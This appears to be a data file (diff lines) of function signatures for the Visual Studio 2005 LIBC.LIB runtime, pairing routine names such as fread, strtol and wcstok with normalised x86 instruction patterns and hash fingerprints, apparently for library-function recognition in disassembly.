+__NLG_Notify1,"MOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],R32\nMOV DWORD PTR DS:[R32+CONST],EBP\nPOP R32\nPOP R32\nRETN CONST",Tnz83JlUq4MAAAAAmVSrgwAAAAAAAAAA,[],1ea3c8380e739200a7cdd44cf657af1346ad854a,VS2005,LIBC.LIB
+__NLG_Return2,"ADD BYTE PTR DS:[R32],R8\nADD BYTE PTR DS:[R32+CONST],R8\nOR BYTE PTR DS:[R32+CONST],R8\nOR R8,CONST\nPOP R32\nRETN CONST",BbfYWwAAAAAAAAAAXqODJwW32FsAAAAA,[],aaa8b421e6f5f6669ac8437daf3b484085c85c17,VS2005,LIBC.LIB
+__filwbuf,"PUSH DWORD PTR DS:[R32+CONST]\nPUSH DWORD PTR DS:[R32+CONST]\nPUSH DWORD PTR DS:[R32+CONST]\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR DS:[R32+CONST],R32\nTEST R32,R32\nJCC CONST",nMf9vq3ZOHU9ZCFoe/xTozF4QnAthlOeKrNC3i++OUcAAAAAL745R4sNFEw/4G0ULYZTnjF4QnDYzQSmP+BtFIsNFEwAAAAA2M0EppzH/b6nJQ3IpyUNyDF4QnAAAAAAiw0UTPO6C1Puj+9o7o/vaPO6C1Nb0BXgW9AV4PO6C1OWc/BfPWQhaFDsZiwAAAAAlnPwX/O6C1MAAAAA87oLUwAAAAAAAAAAUOxmLIklrN27tlwsiSWs3TF4QnAAAAAAu7ZcLIklrN27tlwsu7ZcLIklrN3uj+9oMXhCcAAAAAAAAAAA7o/vaIsNFEwo0VBEKNFQRCqzQt73825o9/NuaC++OUcAAAAArdk4dVDsZiwAAAAA,[],7fc870254290a19e5f99fc0ad76a29299b59badf,VS2005,LIBC.LIB
+__fstat,"MOV R32,R32\nAND R32,CONST\nSAR R32,CONST\nSHL CONST2,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32",h6NtfdAXQg2D8oEZr7CfhuwF1DkAAAAABIxCgCcPdRLQF0IN93dsvi2OoXy7IZT2g/KBGYUEC8IAAAAAY6Z8hC6JAm4AAAAAN0fR6tjF9kS7IZT2hQQLwuwF1DkAAAAAuyGU9tjF9kSgNzqhLokCbgAAAAAAAAAA7AXUOS6JAm4AAAAAoDc6oa71/50AAAAA2MX2RK+wn4bYxfZEHY5bcmOmfITJbSdDlXobi671/50AAAAAelzenSqfvVYAAAAA2MX2RK+wn4aVehuLKp+9ViSKTQ/EBW6yuyGU9jdH0eotjqF8LY6hfK+wn4YtjqF80BdCDYUEC8IAAAAAyW0nQ2OmfISn9PAAJw91Ek97SAHjyoV048qFdC2OoXwAAAAAv3cGzyqfvVYAAAAALY6hfK+wn4aHKFbKT3tIAYUEC8ItjqF8LY6hfIUEC8ItjqF8xAVusuwF1DkAAAAAJIpND8QFbrJxWpQ6p/TwAASMQoC7tlwshyhWytjF9kS7IZT2rvX/newF1DkAAAAALY6hfIUEC8L3d2y+u7ZcLL93Bs+7tlwscVqUOuwF1DkAAAAAu7ZcLHpc3p2Ho219,[],4cefe8e0ded0d82f26a09c55b3044c9c7d4a23cf,VS2005,LIBC.LIB
+_ferror,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nRETN",n+4hAgAAAAAAAAAA,[],a53ab7dd9d11fc08be030e8f71d88669ecaacf8a,VS2005,LIBC.LIB
+_feof,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nRETN",n+4hAgAAAAAAAAAA,[],dbcfa02affca0374c840d835621410b61d3d9d44,VS2005,LIBC.LIB
+_atan,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nJCC CONST",gXJ9eYp8rQWKfK0FN9QtU9FIlKUAAAAAAFkkeehVq9qc7n8w0UiUpYp8rQWKfK0FsXXuR9FIlKUAAAAA6FWr2jfULVPNLBGm0UiUpXtGESB7RhEgzSwRpjfULVMpBN3cinytBTfULVMAAAAAnO5/MIFyfXnzonydKQTd3NFIlKWxde5H86J8nYp8rQWKfK0Fe0YRIAAAAAAAAAAA,[],ea1f3294b9a0f66827ab20fed72be85dc206da6f,VS2005,LIBC.LIB
+__CIatan,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,AaF1swAAAAAAAAAAdqHX0LygXegBoXWzvKBd6AAAAAAAAAAA,a3422235a239ce30b8e613233f31cd5d143f3fa7,VS2005,LIBC.LIB
+__lsearch,"PUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR SS:[EBP+CONST]\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",p2V65gAAAAAAAAAAgJrGWadleuYAAAAAVTePEYCaxlmalHRNmpR0TadleuZja4qTY2uKk5qUdE2AmsZZ,[],8375fd7f9ac732531dd7d0be3e1dbec4b607f964,VS2005,LIBC.LIB
+_fread,"MOV R32,R32\nPUSH R32\nPUSH DWORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nSUB DWORD PTR SS:[EBP+CONST],R32\nSUB DWORD PTR DS:[R32+CONST],R32\nADD DWORD PTR DS:[R32],R32",QUXQG5zufzAAAAAAnO5/MN8TwOUuVbn+QUXQG0L41tYAAAAALlW5/t8TwOXkUryfQvjW1gAAAAAAAAAAac0GAEFF0BtBRdAb5FK8n0wXBaARY5yDhQQLwt2i1y4AAAAATBcFoGnNBgAAAAAA3aLXLkL41tYAAAAAEWOcg2nNBgAAAAAA3xPA5QVrr7cWOAgiFjgIIg852mrSXjlzssTCKsBT/ItmeTE10l45cw852moAAAAADznaauOiq3y7tlwsu7ZcLIUEC8JgRtLlZnkxNUL41tYAAAAAYEbS5WnNBgAAAAAAwFP8i/Qp7ghxWpQ6BWuvt92i1y4JstJmcVqUOpzufzAAAAAACbLSZmnNBgAAAAAA9CnuCJzufzAAAAAA46KrfN2i1y4AAAAA,[],32cd64447944c9089140db7b81fcecf4b0567ace,VS2005,LIBC.LIB
+__mbctombb,"MOVZX R32,WORD PTR DS:[R32]\nMOV R32,R32\nSUB R32,R32\nJCC CONST",HQwzn+U+tEIAAAAAp6LXhD/DesUAAAAAbcn8fj/DesUqs0Lecug6RdVYAu2y9BmIsvQZiKei14TVWALtP8N6xQAAAAAAAAAA5T60QhFkM4OoYlkS6ezJmh0MM5/joqt8KrNC3qFQwFgAAAAA1VgC7aFQwFheo4MnqGJZEuU+tELoVava46KrfD/DesUAAAAAoVDAWKei14QwlhcGMJYXBtVYAu1y6DpFXqODJz/DesUAAAAAEWQzgz/DesUAAAAA6FWr2j/DesVtyfx+,[],cef348b836bc45e67f6237119bce1ad1a38ec1d4,VS2005,LIBC.LIB
+__mbbtombc,"MOV R8,BYTE PTR DS:[R32+CONST]\nADD R32,CONST\nINC R32\nTEST R8,R8\nJCC CONST",AOHWawAAAAAAAAAAu7ZcLOhVq9qZ3GiB2W/H4QeU2IwA4dZr6FWr2gDh1mv/3AdXmdxogQAAAAAAAAAA/9wHVwDh1msqs0LexPG3ZQGhdbO7tlwsAOHWawAAAAAAAAAA6FWr2uF3vxnIc6cK4ZjA8gDh1msAAAAAyHOnCgAAAAAAAAAAB5TYjOGYwPLZb8fhKrNC3geU2IwAAAAAu7ZcLOhVq9q7tlwsAaF1swAAAAAAAAAA4Xe/GQDh1mvoVava,[],24cf3b8bc348d65cbd3e5ddef181e936b8aed23b,VS2005,LIBC.LIB
+__wspawnv,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",HYNmwQAAAAAAAAAA,XqODJ8KaPa0AAAAAB+j5j8KaPa0AAAAArg7L2nLoOkUAAAAAcug6RfQ42DYSoox5EqKMefQ42DZBG/+Acug6RUFF0Bu5m+6qQRv/gLLi1GXEkqZouZvuqkFF0BsAAAAAwpo9rXLoOkUAAAAAQRv/gMSSpmjx1sdAQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAAxJKmaEL41tYAAAAAsuLUZbER8QQAAAAA8dbHQPQ42DYAAAAAsRHxBAfo+Y9Lfz7Wcug6RSbu4WVy6DpFcug6RfQ42DYm7uFlJu7hZfQ42DYAAAAA9DjYNkEb/4BNBNpWHV2wR3LoOkVy6DpFS38+1rER8QReo4MnTQTaVnLoOkWuDsva,d0c20b0edbcffcc71a7897b9629c008cb22b5ff5,VS2005,LIBC.LIB
+_wcsncpy,"MOV R16,WORD PTR DS:[R32]\nMOV WORD PTR DS:[R32],R16\nINC R32\nINC R32\nINC R32\nINC R32\nTEST R16,R16\nJCC CONST",l9p7lMNMSgpy6DpFcug6RdV/HhyX2nuUl9p7lNV/Hhzuq9VI7qvVSNV/HhwAAAAAhQQLwsNMSgoAAAAAw0xKCnLoOkWX2nuU1X8eHAAAAAAAAAAAHzUI5tV/HhyFBAvC,[],0f98bb465e07e6fb87984860217e4b03bcfc0ed0,VS2005,LIBC.LIB
+__wsystem,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nXOR R32,R32",UAeYGk6gi7EAAAAAu7ZcLE6gi7F7JghIWd6yw06gi7EPIdWqeyYISAqkZuA3Im/CTqCLsQAAAAAAAAAADyHVqnsmCEi7tlwsDczAAU6gi7EAAAAAwK4E+HsmCEhZ3rLDNyJvwk6gi7EAAAAAcug6RVAHmBoNzMAB4WMWqsCuBPhy6DpFCqRm4E6gi7EAAAAA,[],d5147c7a67184c41184e5ebf84998a8495eb64bf,VS2005,LIBC.LIB
+?_query_new_mode@@YAHXZ,"MOV R32,DWORD PTR DS:[0]\nRETN",DcG51AAAAAAAAAAA,[],a84f246eb814acab8074ce2b2fff3668005d5e94,VS2005,LIBC.LIB
+?_set_new_mode@@YAHH@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,R32\nAND R32,CONST\nCMP R32,R32\nJCC CONST",Qp/AogzFeqObkFD8DMV6owAAAAAAAAAAm5BQ/AAAAAAAAAAA,[],b1ec5765b2832372087d92ebd71dc2ba2959aa07,VS2005,LIBC.LIB
+__mbslwr,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nCMP BYTE PTR DS:[R32],0\nJCC CONST",s/cJwR4DhsoAAAAAulSEWQ3MwAErEZv7HgOGymGagYkAAAAAYZqBiQ1msVYm7uFlKxGb+2GagYnQBQWwf9eRqB4Dhsqz9wnB0AUFsGGagYkAAAAAJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAADczAATlafGAAAAAADWaxVn/Xkai6VIRZGPPByibu4WUNZrFW,[],f2cc190bd374f4b9f7df9620ed3b3ca237d1dcaf,VS2005,LIBC.LIB
+__expand,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",WFl2n5KluqsAAAAAkqW6qz/DesUAAAAAr6jZcRCJOp61tHz4DczAAT/DesUAAAAArlC47XLoOkW3mZOqtbR8+D/DesUAAAAAEIk6nj/DesUAAAAAP8N6xQAAAAAAAAAAt5mTqhCJOp6vqNlxcug6RZKluqtYWXafUwg4ba5QuO0NzMAB,[],7fa2e1a590c7938497febe5429b020bba2f94648,VS2005,LIBC.LIB
+__setjmp3,"PUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[ESP+CONST]\nLEA R32,DWORD PTR DS:[R32+CONST]\nCMP R32,CONST\nJCC CONST",qeQ3UxY4CCL0Ke4IveQXQSjiYecqs0Le1332Xdd99l1xWpQ6cVqUOlLONpUAAAAAKOJh51LONpUAAAAA1332XVLONpW95BdBUs42lQAAAAAAAAAA9CnuCFLONpUAAAAAKrNC3ijiYecAAAAAFjgIInFalDrXffZd,[],ff814153e9772e9f5814fbb1385b7ac33dc390c0,VS2005,LIBC.LIB
+__inpd,"MOV R16,WORD PTR SS:[ESP+CONST]\nIN R32,R16\nRETN",E2SoagAAAAAAAAAA,[],47f7cc7254d4215d11e3dc125662ada756803794,VS2005,LIBC.LIB
+__inpw,"MOV R16,WORD PTR SS:[ESP+CONST]\nIN R16,R16\nRETN",nbMG+gAAAAAAAAAA,[],b896ead7372f6106cc15bbfcdd3680d979cb551d,VS2005,LIBC.LIB
+__inp,"XOR R32,R32\nMOV R16,WORD PTR SS:[ESP+CONST]\nIN R8,R16\nRETN",SXVyzAAAAAAAAAAA,[],510cd67bcc01c346c4e2c0a06065617c332175a8,VS2005,LIBC.LIB
+__spawnlp,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",bvadnQAAAAAAAAAA,HYNmwQAAAAAAAAAA,1509d67c3643413fbcd68f9b967e0e68625d6714,VS2005,LIBC.LIB
+_wcstok,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nSUB R32,R32\nMOV DWORD PTR DS:[0],R32\nNEG R32\nSBB R32,R32\nPOP R32\nAND R32,DWORD PTR SS:[EBP+CONST]",nsgjtNBFVsOag203CXYH8NFiCyrUyVXv1MlV75qDbTczI5M5Ju7hZYz41XgAAAAAXqODJzOI/9UAAAAAjPjVeOlYYeueyCO0h1QhfDOI/9UAAAAAnsgjtIz41XjpWGHrJu7hZYz41XgAAAAAmoNtNzOI/9UzI5M5jPjVeOlYYeueyCO0M4j/1QAAAAAAAAAA0EVWw+lYYesm7uFl6Vhh65qDbTeeyCO00WILKpqDbTczI5M56Vhh64dUIXyeyCO0MyOTOdBFVsMAAAAAMyOTOdBFVsMAAAAAnsgjtIz41XjpWGHrnsgjtNBFVsNeo4Mn0EVWw+lYYesm7uFl,[],3bd8cb30ee0bd4ac5e68101323cf95808ae8cd79,VS2005,LIBC.LIB
+__fileno,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nRETN",m+X+UgAAAAAAAAAA,[],e6084b109668a7291e926de7a85dcbc434c03b67,VS2005,LIBC.LIB
+__aullrem,"DIV R32\nMOV R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nXCHG R32,R32\nMUL DWORD PTR SS:[ESP+CONST]\nADD R32,R32\nJCC CONST",nIZRODqkpDQhh3ljgktfFIJLXxQ5rLBpXmG3DwAAAAAAAAAAIYd5YyymeXSchlE4nIZROCymeXQ6pKQ0OqSkNCymeXQAAAAAOaywaTqkpDSchlE4kTDPGKN6GjvopOJGo3oaO4JLXxQAAAAALKZ5dF5htw8AAAAA6KTiRl5htw8AAAAA,[],a64d88a907eed793f16c4cdabe2a6bae3ad398d2,VS2005,LIBC.LIB
+__fsqrt,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFSQRT\nFSTP QWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR SS:[EBP+CONST]",Uj1P3QAAAAAAAAAA,[],0eb7585019b338ef5a94ede684ed42eb2fe332df,VS2005,LIBC.LIB
+__mbsnbicoll,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL CONST\nADD ESP,CONST\nTEST R32,R32",cMiU5MHSGqFPi8wKT4vMCgAAAAAAAAAAwdIaodNN+HEAAAAAMXhCcAAAAAAAAAAA0034ccK8QFYxeEJwwrxAVgAAAAAAAAAA,[],fdb84577267c92cda4aa11c2ab736c70f3ad5bbf,VS2005,LIBC.LIB
+_ctime,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",Us42lQAAAAAAAAAAYmbX/AAAAAAAAAAAWrCX6FLONpViZtf8,[],df9be845b37304185fde017c329623d502f85571,VS2005,LIBC.LIB
+_strtoul,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",HYNmwQAAAAAAAAAA,v9FLiyQDw50AAAAA+Hf5weOiq3wAAAAAYD0rkPmsD9DCgPP8IYd5Y+Oiq3zu5n/EyNLIGFvQFeDjoqt87uZ/xCko+BXjoqt8bluQs3LoOkUAAAAAcug6ReL0B/YXl1+Q46KrfHLoOkUAAAAAuyGU9nLoOkWmnr92pAiH6S5Vuf5O/QsUs3Zu1vmsD9DCgPP8W9AV4Nse7sakCIfpKSj4FbN2btYAAAAAcug6RScPdRKt2Th1rdk4dScPdRIAAAAA2x7uxi5Vuf5O/QsUwh9WRrN2btYAAAAAJw91EqA3OqGt/Rq5rf0auaA3OqEAAAAATv0LFC5Vuf5O/QsU+awP0CQDw52x7kSh4vQH9p0pSRNy6DpFoDc6oUL41tYAAAAATv0LFC5Vuf7ottkzLlW5/ibu4WVTTYHzse5Eod8TwOUAAAAA6LbZM7shlPZb0BXgU02B8ybu4WUAAAAALUeKtuCNJQ+54J6QJu7hZUL41tYAAAAAcug6RSQDw52x7kShQvjW1gAAAAAAAAAAJAPDnaC/6mhpF9xeW9AV4I/izv30Ke4I2M0EpmA9K5AptSHd46KrfHLoOkUAAAAA9CnuCGA9K5AAAAAAaRfcXnLoOkUAAAAAnSlJE6aev3Zb0BXg46KrfKQIh+kAAAAAj+LO/TdH0erYzQSmN0fR6mA9K5Bb0BXgoL/qaOL0B/YXl1+QW9AV4HLoOkW7tlwswoDz/HLoOkUAAAAAu7ZcLHLoOkWLDRRMueCekHLoOkUAAAAAiw0UTKaev3Zy6DpFcug6ReOiq3z4d/nBF5dfkOL0B/Z2oZSSuyGU9mA9K5Bb0BXg2M0EpjdH0er0Ke4Icug6RXLoOkW7IZT2W9AV4GA9K5CP4s794I0lD8jSyBi/0UuL9CnuCGA9K5AAAAAAj+LO/Sm1Id3YzQSmpp6/dm5bkLPjoqt83xPA5eL0B/Z2oZSS46KrfMIfVkYAAAAAdqGUkiko+BUhh3ljKbUh3fmsD9DCgPP8cug6RcjSyBi/0UuLJAPDneCNJQ+54J6Q,cae63d2b1cc3348b2b96f97c054427ea397a9458,VS2005,LIBC.LIB
+_strtol,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",HYNmwQAAAAAAAAAA,IYd5Y+Oiq3zu5n/EyNLIGFvQFeDjoqt87uZ/xCko+BXjoqt8bluQs3LoOkUAAAAAJAPDneCNJQ+54J6Q46KrfKQIh+kAAAAAs3Zu1vmsD9DCgPP8W9AV4Nse7sakCIfp+Hf5weOiq3wAAAAAKSj4FbN2btYAAAAAcug6RScPdRKt2Th1rdk4dScPdRIAAAAA2x7uxi5Vuf5O/QsUcug6ReOiq3z4d/nBwoDz/HLoOkUAAAAAJw91EqA3OqGt/Rq5rf0auaA3OqEAAAAATv0LFC5Vuf5O/QsU+awP0CQDw52x7kShcug6RSQDw52x7kShcug6ReL0B/YXl1+Q4vQH9p0pSRNy6DpFoDc6oUL41tYAAAAATv0LFC5Vuf7ottkzwh9WRrN2btYAAAAALlW5/ibu4WVTTYHzse5Eod8TwOUAAAAA6LbZM7shlPZb0BXgU02B8ybu4WUAAAAALUeKtuCNJQ+54J6QJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAAJAPDnaC/6mhpF9xeW9AV4I/izv30Ke4I46KrfHLoOkUAAAAA9CnuCGA9K5AAAAAAaRfcXnLoOkUAAAAAnSlJE6aev3Zb0BXgj+LO/TdH0erYzQSmoL/qaOL0B/YXl1+QW9AV4HLoOkW7tlws46KrfMIfVkYAAAAA9CnuCGA9K5AAAAAAu7ZcLHLoOkWLDRRMueCekHLoOkUAAAAAiw0UTKaev3Zy6DpFN0fR6mA9K5Bb0BXgF5dfkOL0B/Z2oZSSuyGU9mA9K5Bb0BXgcug6RXLoOkW7IZT2W9AV4GA9K5CP4s794I0lD8jSyBi/0UuLj+LO/Sm1Id3YzQSm2M0EpjdH0er0Ke4Ipp6/dm5bkLPjoqt83xPA5eL0B/Z2oZSS2M0EpmA9K5AptSHddqGUkiko+BUhh3lj46KrfHLoOkUAAAAAKbUh3fmsD9DCgPP8uyGU9nLoOkWmnr92cug6RcjSyBi/0UuLpAiH6S5Vuf5O/QsUv9FLiyQDw50AAAAAYD0rkPmsD9DCgPP8,d0c20b0edbcffcc71a7897b9629c008cb22b5ff5,VS2005,LIBC.LIB
+_wcstoul,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",HYNmwQAAAAAAAAAA,46KrfHLoOkUAAAAA6jKEuOoyhLjjoqt8pszez9se7sYAAAAA46KrfNii9PQAAAAANXgBMtF0+9ZWJSGDB/2JQV/jIP8AAAAA6jKEuNse7samzN7PW9AV4HLoOkUtDNr2ViUhg3LoOkUAAAAALQza9nLoOkWLDRRMGuho+3LoOkUAAAAA2x7uxi5Vuf5O/QsU0XT71nFymPIa6Gj7W9AV4KA3OqGt/Rq5Tv0LFC5Vuf5O/QsUcug6RXLoOkW7IZT2uyGU9nLoOkUT/n5yTv0LFC5Vuf5y6DpFE/5+ckt+6f/joqt8nSlJExP+fnJb0BXgiw0UTBP+fnJy6DpFcug6Rbu2XCzqMoS4cug6RXFymPJ2oZSS46KrfKbM3s8AAAAA46KrfHLoOkUAAAAAdqGUktmXt0Qhh3lj1nzuDF/jIP8AAAAAS37p/3LoOkUAAAAA7ryWW1hZdp/qMoS4IYd5Y+Oiq3wk4XqlJOF6pdmXt0Tjoqt86jKEuFhZdp8H/YlB6jKEuCIBisUjKqYEcug6RVvQFeBTTYHzX+Mg/yIBisUAAAAAU02B81vQFeAAAAAAWFl2n7u2XCwAAAAAykdE/TV4ATIAAAAAu7ZcLCIBisXqMoS42Ze3RNii9PQAAAAArf0auaA3OqEAAAAA6jKEuCIBisXuvJZbcug6ReOiq3xBRdAb2KL09DV4ATIAAAAAoDc6oUL41tYAAAAA6jKEuO68llvWfO4MLlW5/ibu4WWt2Th1cXKY8p0pSRNy6DpFNXgBMuoyhLjYovT07ryWWyMqpgTqMoS4rdk4dSbu4WUAAAAAIyqmBCIBisUAAAAAJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAA2KL09DV4ATIAAAAAIgGKxTV4ATIAAAAAQUXQG+Oiq3wAAAAA,cae63d2b1cc3348b2b96f97c054427ea397a9458,VS2005,LIBC.LIB
+_wcstol,"PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",HYNmwQAAAAAAAAAA,iw0UTBP+fnJy6DpFcug6Rbu2XCzqMoS4cug6RXFymPJ2oZSS46KrfHLoOkUAAAAAdqGUktmXt0Qhh3lj1nzuDF/jIP8AAAAAS37p/3LoOkUAAAAA7ryWW1hZdp/qMoS4IYd5Y+Oiq3wk4XqlJOF6pdmXt0Tjoqt86jKEuFhZdp8H/YlBcug6RVvQFeBTTYHzX+Mg/yIBisUAAAAAU02B81vQFeAAAAAAWFl2n7u2XCwAAAAAykdE/TV4ATIAAAAAu7ZcLCIBisXqMoS42Ze3RNii9PQAAAAArf0auaA3OqEAAAAA6jKEuCIBisXuvJZbcug6ReOiq3xBRdAb2KL09DV4ATIAAAAAoDc6oUL41tYAAAAA6jKEuO68llvWfO4MLlW5/ibu4WWt2Th1cXKY8p0pSRNy6DpFNXgBMuoyhLjYovT06jKEuCIBisUjKqYE7ryWWyMqpgTqMoS4rdk4dSbu4WUAAAAAIyqmBCIBisUAAAAAJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAA2KL09DV4ATIAAAAAIgGKxTV4ATIAAAAAQUXQG+Oiq3wAAAAAB/2JQV/jIP8AAAAA46KrfHLoOkUAAAAA6jKEuOoyhLjjoqt8pszez9se7sYAAAAAnSlJExP+fnJb0BXg46KrfKbM3s8AAAAA6jKEuNse7samzN7PW9AV4HLoOkUtDNr2ViUhg3LoOkUAAAAALQza9nLoOkWLDRRM46KrfNii9PQAAAAA2x7uxi5Vuf5O/QsUGuho+3LoOkUAAAAA0XT71nFymPIa6Gj7W9AV4KA3OqGt/Rq5Tv0LFC5Vuf5O/QsUcug6RXLoOkW7IZT2uyGU9nLoOkUT/n5yTv0LFC5Vuf5y6DpFE/5+ckt+6f/joqt8NXgBMtF0+9ZWJSGD,d0c20b0edbcffcc71a7897b9629c008cb22b5ff5,VS2005,LIBC.LIB
+__eof,"PUSH R32\nPUSH CONST\nPUSH CONST\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST\nCMP R32,-1",DQwOID/DesUAAAAA/5dwYT/DesUAAAAA5l06ZCSjmVxy6DpFoTaV65IE5Z88zmEiJKOZXD/DesUAAAAAP8N6xQAAAAAAAAAAkgTlnwAAAAAAAAAAcug6Rf+XcGENDA4gPM5hIpIE5Z/qcve86nL3vCSjmVzmXTpk,[],cd92bf0791cffffb7d40406312d3820f22e732bf,VS2005,LIBC.LIB
+__disable,CLI\nRETN,OmU1PAAAAAAAAAAA,[],8856c36c4702b0536e20c0e6a5a4def003ab875e,VS2005,LIBC.LIB
+__enable,STI\nRETN,OmU1PAAAAAAAAAAA,[],701ab1760683397e77e51ddcdd7a1a2ea82cc01a,VS2005,LIBC.LIB
+__wfindnext,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR DS:[0]\nTEST R32,R32",miFd3E8+83JbP0M+KcAj0AAAAAAAAAAAGaZm/ynAI9AAAAAAu7ZcLGqGyxK7tlwsu7ZcLBmmZv+7tlwsaobLEinAI9AAAAAAg/KBGSnAI9AAAAAAu7ZcLGqGyxKD8oEZTz7zcgAAAAAAAAAAWz9DPoPygRm7tlws,[],2d379f914afde48331534700f3fcf54624b72106,VS2005,LIBC.LIB
+__wfindfirst,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32",u7ZcLBmmZv+7tlwsh7WA6k6gi7EAAAAAaobLEsSSpmgAAAAAxJKmaE6gi7EAAAAAg/KBGcSSpmgAAAAAtmUaEIe1gOpbP0M+Wz9DPoPygRm7tlwsu7ZcLGqGyxKD8oEZTqCLsQAAAAAAAAAAGaZm/8SSpmgAAAAAu7ZcLGqGyxK7tlws,[],911e47a11a90628efa7c7714659d31400ffc1131,VS2005,LIBC.LIB
+_strcmp,"MOV R16,WORD PTR DS:[R32]\nADD CONST,CONST\nCMP R8,BYTE PTR DS:[R32]\nJCC CONST",FMSIatok6RXYzQSm2M0EplLONpXEkqZoYYMmR9ok6RWtkw1F2M0EplLONpUHYZ6GxJKmaFFo1lAAAAAAUs42lQAAAAAAAAAA2M0EplLONpUUxIhq2iTpFQAAAAAAAAAAWNooOlFo1lCzTHFDrZMNRVLONpVY2ig6s0xxQ9ok6RXYzQSmFMSIatok6RVMYWxWB2Gehtok6RXYzQSm2M0EplLONpUUxIhqWNooOrNMcUNhgyZHESeFcFjaKDpRaNZQUWjWUNok6RXYzQSm2M0EplLONpUUxIhqTGFsVlFo1lAm7uFlFMSIatok6RXYzQSmJu7hZVLONpUAAAAA,[],af97b1f0a5de1ac71e07fc6431503061a82ebd3a,VS2005,LIBC.LIB
+__fFEXP,"MOV BYTE PTR SS:[EBP+CONST],CONST\nXOR R8,R8\nFLDL2E\nFMULP ST(1),ST\nCALL CONST\nFLD1\nFADDP ST(1),ST\nTEST BYTE PTR SS:[EBP+CONST],CONST",W9AV4NjNBKYYWqjH63I7EcB/WOoAAAAAb2aGgMB/WOoAAAAAGFqoxzUWchMAAAAA2M0EpjUWchMAAAAAyZhnMdjNBKYYWqjHwH9Y6lvQFeABBe8nAQXvJ8mYZzGxde5HNRZyE1Jo6lsAAAAANRZyE23okXcAAAAAUmjqWzUWchMcrMkivTmwalvQFeABBe8nsXXuR1vQFeAAAAAAHKzJIm9mhoDrcjsRbeiRdwAAAAAAAAAA,[],2257fae380af039ab9e2eba5a65adc684f66b8d0,VS2005,LIBC.LIB
+__rtinfpop,"FSTP ST\nFSTP ST\nFLD TBYTE PTR DS:[0]\nMOV BYTE PTR SS:[EBP+CONST],CONST\nRETN",beiRdwAAAAAAAAAA,[],23219437760af8dc8495785cc7b2215759cb729f,VS2005,LIBC.LIB
